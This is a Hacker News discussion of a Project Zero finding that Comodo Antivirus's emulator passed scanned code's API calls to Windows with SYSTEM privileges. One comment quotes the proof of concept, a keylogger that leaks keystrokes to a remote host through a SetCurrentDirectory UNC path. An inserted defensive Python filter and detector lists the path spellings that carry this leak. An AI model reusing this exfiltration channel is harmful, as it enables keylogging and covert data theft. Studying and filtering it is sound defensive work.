Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans (chromium.org)
150 points by cespare on March 23, 2016 | hide | past | favorite | 35 comments



Google's Project Zero https://en.wikipedia.org/wiki/Project_Zero_(Google) is absolutely excellent! Google tasks top-notch engineers to find zero-day bugs in other companies' products, making us all safer.

Very big kudos to Google! The flood of bugs they keep finding and getting other companies to fix is fantastic!


Indeed, they've done some great work.

It's times like this that make me glad I'm not a developer. If I were, I'd be forever worried that today is the day I open up my mail client and see a new message from 'taviso@'.


I'd look forward to it, personally, but I like learning new things about security.


I'd likely donate if it helped the effort. Project Zero has been very successful in terms of vulnerabilities they've had fixed.


I don't think Google needs your money. Best keep it in your pocket.

But yeah, agreed. Project Zero is amazing. It seems like every iOS security release includes at least one major zero-day discovered by Ian Beer.

There is definitely some major talent on that team. It makes me wonder what an equivalently skilled team would look like on the "black market."


When it comes to security research, Tavis Ormandy is truly inspirational. It isn't just about the bugs he discovers, but I find his explanations often very simple to understand.

This is an extremely severe design issue, where an anti-virus can not only be bypassed, but it can actually be used to compromise an attacked system. Comodo runs suspicious code inside an emulator (VM), but instead of implementing full OS emulation, they allow a lot of the API calls inside the emulator to leak out to the hosting computer, and actually run them with NT AUTHORITY\SYSTEM privileges (the Windows equivalent of root).

The exploit code serves as a simple key logger, by repeatedly calling GetKeyState (with system privileges!), and leaking this information to a remote server using the SetCurrentDirectory() API (by calling SetCurrentDirectory("\\\\?\\UNC\\192.168.237.1\\<Pressed key>")).

This is a beautiful attack, and I couldn't help but smirk at the "wtf!!!!" comment.
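The comment above describes the missing piece: a forwarded SetCurrentDirectory() never checked whether its path argument pointed at the network. The following is an added illustration (not Comodo's code, nor anything from the bug report) of what such a parameter filter has to cover, including the extended-length \\?\UNC\ form quoted above and the forward-slash spelling Win32 also accepts, plus a detection view over the calls that would have reached the host. Host names, the EmulatedApi class and the sample calls are constructed for this example.

```python
import re

_DRIVE = re.compile(r"^[A-Za-z]:")

def classify_path(arg: str) -> str:
    """Classify a Win32 path argument as 'local', 'unc' (network) or 'device'."""
    p = arg.replace("/", "\\")          # Win32 accepts forward slashes as separators
    low = p.lower()
    if low.startswith("\\\\?\\unc\\") or low.startswith("\\\\.\\unc\\"):
        return "unc"                    # extended-length UNC: \\?\UNC\host\share
    if low.startswith("\\\\?\\") or low.startswith("\\\\.\\"):
        # \\?\C:\x is a local extended-length path; anything else under the
        # prefix (\\.\pipe\, \\?\GLOBALROOT\, \\?\Volume{..}) names a device/object
        return "local" if _DRIVE.match(p[4:]) else "device"
    if p.startswith("\\\\"):
        return "unc"                    # plain \\host\share
    return "local"

class EmulatedApi:
    """Stand-in (constructed) for an emulator that forwards calls to the host."""
    def __init__(self, filter_params: bool):
        self.filter_params = filter_params
        self.forwarded = []             # calls that would run on the host as SYSTEM
        self.blocked = []

    def SetCurrentDirectory(self, path: str) -> bool:
        # The weak design: forward the call unchanged. The filtered variant
        # refuses any argument that would make the host touch the network.
        if self.filter_params and classify_path(path) != "local":
            self.blocked.append(path)
            return False
        self.forwarded.append(("SetCurrentDirectory", path))
        return True

def outbound_hosts(forwarded) -> set:
    """Detection view: which remote hosts would the scanning process have contacted?"""
    hosts = set()
    for _, path in forwarded:
        if classify_path(path) == "unc":
            p = path.replace("/", "\\")
            body = p[8:] if p.lower().startswith(("\\\\?\\unc\\", "\\\\.\\unc\\")) else p[2:]
            hosts.add(body.split("\\", 1)[0])
    return hosts

def demo():
    # Constructed sample calls; 192.0.2.10 is a documentation-range placeholder.
    calls = [r"C:\Users\Public", r"\\?\UNC\192.0.2.10\k", r"\\192.0.2.10\s", "//192.0.2.10/x"]
    unfiltered, filtered = EmulatedApi(False), EmulatedApi(True)
    for c in calls:
        unfiltered.SetCurrentDirectory(c)
        filtered.SetCurrentDirectory(c)
    return outbound_hosts(unfiltered.forwarded), outbound_hosts(filtered.forwarded)
```

A filter that only rejected a literal `\\` prefix would still let the `\\?\UNC\` and `//` spellings through, which is why the classifier normalises first and treats the namespace prefix separately.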


> This is an extremely severe design issue, where an Anti Virus can not only be bypassed, but it can actually be used to compromise an attacked system.

Don't we have exactly that design issue in all anti-virus tools, by definition?

All potentially dangerous data is routed through that single tool that runs with high permissions and performs complex computations. Every single programming error in the anti-virus tool (e.g. a buffer overflow) can potentially lead to a compromised system. An attacker can now choose not just between vulnerabilities of browser, mail client and operating system, but also use vulnerabilities of the anti-virus tool.

So anti-virus is by definition a tool with complex behaviour and a large attack surface.

For many security people, this alone qualifies anti-virus tools as an additional threat, not as part of the solution - even without dramatic failures as shown in this particular case.


Some previous Comodo issues:

Comodo ships Adware Privdog worse than Superfish

https://news.ycombinator.com/item?id=9091917

Comodo “Chromodo” Browser disables same origin policy

https://news.ycombinator.com/item?id=11021633

Comodo Internet Security installs and starts a VNC server by default

https://news.ycombinator.com/item?id=11129170


There is no doubt some engineer at Comodo whose heart sinks every time he/she thinks Tavis is done tearing their software apart and opens their bug reports to find yet another gaping security hole.


Actually, we find two issues here:

1) that this huge attack surface existed in the first place. (almost by design)

2) how they "fixed" it. (not questioning their design at all)

The whole bug report reads like an invitation to find more creative combinations of API calls that their filter forwards to the system. From the first comment:

> They're planning to fix those two issues and review all the remaining API's for missing parameter filtering, but wanted to know if I agree that their design is sound. I said I suppose they're correct in theory, but this is a lot of attack surface [...]


> We have also disabled this feature by default UNTIL we complete the security review.

So creative combinations won't help until they reenable it.


My first thought is: so now I am relying on a company that basically provides me free services for security audits of other companies, some of which I pay for the services they deliver. (Last one is a stretch.) Of course, I rely on many free things, but it's the second order aspect here that troubles me.

Is there an indication of the complexity of the bugs they are finding? Are they among those that should be caught by QA?


It's a new kind of incompetent-but-too-big company: "too big for Google to not give you free expert security review". Well, it's just for companies that can make Google's stuff look bad when they enable users to be badly infested with malware.

The magnitude of it in this case is pretty funny ... can you imagine Comodo "security suite" or whatever just 3 months ago? A special secure browser without secure origin policy, a local poorly secured vnc server, a scanning and parsing engine that continually exposes itself to un-trusted input but has ASLR disabled ...

Most of these are not really complicated, they're bad feature ideas. But mass-market security products are feature-driven, not security-driven. So it makes sense that they suck at security.


Looking at this issue and the issues linked in its last comment...

Why are they running things like unpackers and emulators as "NT AUTHORITY\SYSTEM", instead of farming them to less privileged processes?


From the many issues I've seen with Comodo products, either they don't know what they are doing or are doing it on purpose this way (plausible deniability backdoors).


Never trusted the sandbox functionality. I've been installing Comodo CIS with only the firewall and antivirus, sandboxing disabled, HIPS on with low settings. Any notable exploits left that would bypass that?


I basically just use it for the Firewall and HIPS too, because I cannot find another free firewall solution (that isn't Windows firewall) that is any good, and I cannot find any other example of an HIPS that is as easy to set up and run as the Comodo one.

That said, I'm getting seriously tired of their shadiness/incompetence recently.

I need alternatives.


> that isn't Windows firewall

What's wrong with Windows firewall/defender/anti-virus/whatever it's called these days? It's free, it doesn't try to market itself to you, it doesn't smell like malware, and it doesn't seem to show up in these regular sweeps of disastrous security bugs in the third-party solutions.


Windows Firewall has the annoying habit of letting stuff work until one day it just starts doing its job and doesn't. Typically this is through user prompts that either get spacebar'd away due to focus stealing* or blocked because the user doesn't know what it's asking about.

It's a mess working out what it's doing, fixing it and explaining to the user why their perfectly working system just broke. It could really use some organization tools like the Task Scheduler.

*I thought Microsoft promised at one point around the lead up to Windows 7 that they were going to address their stealing focus issues.


"used to forward", from what I understand this has been fixed.


Would you trust them to fix it?

Seems such a big red flag (as though things couldn't get worse for AV-cred these days).


It's a huge red flag - they've temporarily disabled the function while they audit all APIs they're calling, but they still believe their core design is ok - this means they'll go back to emulate with pass-through everything that THEY can't figure a way to exploit.


It's a double-edged sword. Emulating all the OS functions is probably an impossible task for them at the moment. It isn't just about implementing all the OS calls, it's also about implementing them in a way that doesn't allow malware to detect that it's running inside of an emulator.


The sheer wtf of having "Windows running on Windows" is worth discarding this AV entirely. How do you like running TWO operating systems at all times? And people wonder why AVs make powerful machines struggle under minimal load...


Your post reminded me of two cool stories about "Windows on Windows":

1. Microsoft has reimplemented the NT kernel and services as a userspace LibraryOS called Drawbridge (http://ssrg.nicta.com.au/Events/summer/16/baumann.pdf, slide 21)

2. Microsoft teecchniiccaally also already did this in SysWOW64

The first story is much more interesting than the second one.


As the funny fact goes, in the System32 directory you have 64-bit binaries, and in the SysWOW64 directory you have 32-bit binaries.


The reason for the 64-bit stuff in the System32 directory makes sense - they need to ensure that the currently-used DLLs and stuff are in the directory that legacy software is looking at.

On the other hand, the SysWOW64 thing could sure have been named better, to make the whole thing clear.


> The reason for the 64-bit stuff in the System32 directory makes sense - they need to ensure that the currently-used DLLs and stuff are in the directory that legacy software is looking at.

Why? There was no legacy 64-bit software. So any software needing to find the 64-bit system directory needed to (at the very least) be recompiled, but probably needed lots of other small changes as well. So why couldn't one of those simple required changes (to create 64-bit versions of legacy software) be to change the path from which it loads its DLLs?



Perhaps they could use Wine here? It would need to be sandboxed etc., but seems like a lot of reusable work.


That sounds like a way to make the attack surface twice as big.


My god what a mess. I think virus writers and hackers should specifically target anti virus suites, given how much of a security risk these pose to the user. Heh, I guess they do just that. I wouldn't be surprised if some of the virus and anti-virus writers are one and the same people or organizations. Because it makes a lot of sense - open the door to intruders and then tell users it's their fault, then manipulate them into buying your security product. Rinse and repeat and make millions.


Does anyone have any good experiences with any anti-virus software?


17 years ago I used F-prot to disinfect my school's computer lab after it was completely overrun by the Melissa worm. The antivirus industry has certainly earned its terrible reputation, but F-prot was actually pretty good software. It was the first with a heuristics engine, and I remember it actually working on a few occasions.


Anti-virus software vendors, for example.

